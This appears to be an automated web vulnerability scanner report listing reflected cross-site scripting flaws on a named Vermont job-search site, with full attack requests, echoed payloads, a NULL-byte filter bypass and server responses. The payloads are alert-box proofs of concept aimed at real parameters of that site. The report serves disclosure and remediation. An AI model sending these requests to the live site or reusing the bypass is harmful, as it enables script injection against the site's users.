"2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <a href="/ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&formid=47&rand=340991c93e5"><a>3041bdbfc36&choice=1"> ...[SNIP]...
The value of the rand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49ec8"style%3d"x%3aexpression(alert(1))"4a6109f7622c7b188 was submitted in the rand parameter. This input was echoed as 49ec8"style="x:expression(alert(1))"4a6109f7622c7b188 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&usvuserid_adadefault_error=&securitysys=on&formname_error=Form0&choice_error=2&cftextboxextradonotuse=&errorfields=usvuserid&cftextboxextradonotuse_error=&formname=Form0&usvuserid_error=&choice=2&submit_error=Continue&bltextboxextradonotuse1_error=&u_name_error=yes&bltextboxextradonotuse1=&formid=10&old_choice=2&rand=190249ec8"style%3d"x%3aexpression(alert(1))"4a6109f7622c7b188&old_choice_error=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A38%27%7D&FormName=Form0 HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813 Cache-Control: max-age=0 Origin: https://www.vermontjoblink.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:33 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
The value of the rand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0050736"><a>f99e3e72883 was submitted in the rand parameter. This input was echoed as 50736"><a>f99e3e72883 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:33 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <a href="/ada/mn_forgotpass.cfm?securitysys=on&formid=10&rand=344110%0050736"><a>f99e3e72883&choice=1"> ...[SNIP]...
The value of the securitysys request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 742ad"style%3d"x%3aexpression(alert(1))"4cd993a311c127728 was submitted in the securitysys parameter. This input was echoed as 742ad"style="x:expression(alert(1))"4cd993a311c127728 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&usvuserid_adadefault_error=&securitysys=on742ad"style%3d"x%3aexpression(alert(1))"4cd993a311c127728&formname_error=Form0&choice_error=2&cftextboxextradonotuse=&errorfields=usvuserid&cftextboxextradonotuse_error=&formname=Form0&usvuserid_error=&choice=2&submit_error=Continue&bltextboxextradonotuse1_error=&u_name_error=yes&bltextboxextradonotuse1=&formid=10&old_choice=2&rand=1902&old_choice_error=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A38%27%7D&FormName=Form0 HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813 Cache-Control: max-age=0 Origin: https://www.vermontjoblink.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:19 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
The value of the securitysys request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ad65"><a>dc07e9b7fc6 was submitted in the securitysys parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:03 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <a href="/ada/mn_forgotpass.cfm?securitysys=on9ad65"><a>dc07e9b7fc6&formid=10&rand=579601&choice=1"> ...[SNIP]...
The value of the submit request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c951"style%3d"x%3aexpression(alert(1))"e4006df13c4 was submitted in the submit parameter. This input was echoed as 5c951"style="x:expression(alert(1))"e4006df13c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:24 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:08:24'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
The value of the usvuserid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 478b6"style%3d"x%3aexpression(alert(1))"8a8c443b318 was submitted in the usvuserid parameter. This input was echoed as 478b6"style="x:expression(alert(1))"8a8c443b318 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:09 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:08:09'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
The value of the usvuserid_ADAdefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d82c2"style%3d"x%3aexpression(alert(1))"c7cc97eb8fb was submitted in the usvuserid_ADAdefault parameter. This input was echoed as d82c2"style="x:expression(alert(1))"c7cc97eb8fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:13 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:08:13'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5572d"><a>89daaddf139 was submitted in the type parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ada/mn_quicksearch_dsp.cfm?type=e5572d"><a>89daaddf139&choice=1 HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:13:57 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <a href="/ada/mn_quicksearch_dsp.cfm?rand=493049&type=e5572d"><a>89daaddf139&choice=2"> ...[SNIP]...
The value of the reg%5Ftype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f47a3"style%3d"x%3aexpression(alert(1))"fb321437520 was submitted in the reg%5Ftype parameter. This input was echoed as f47a3"style="x:expression(alert(1))"fb321437520 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /ada/mn_registration_dsp.cfm?reg%5Ftype=emf47a3"style%3d"x%3aexpression(alert(1))"fb321437520 HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:23 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Expires: {ts '2011-04-29 17:14:23'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate cache-control: no-cache, no-store, must-revalidate
The value of the def request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ef0e"style%3d"x%3aexpression(alert(1))"f93f40cde7a was submitted in the def parameter. This input was echoed as 9ef0e"style="x:expression(alert(1))"f93f40cde7a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
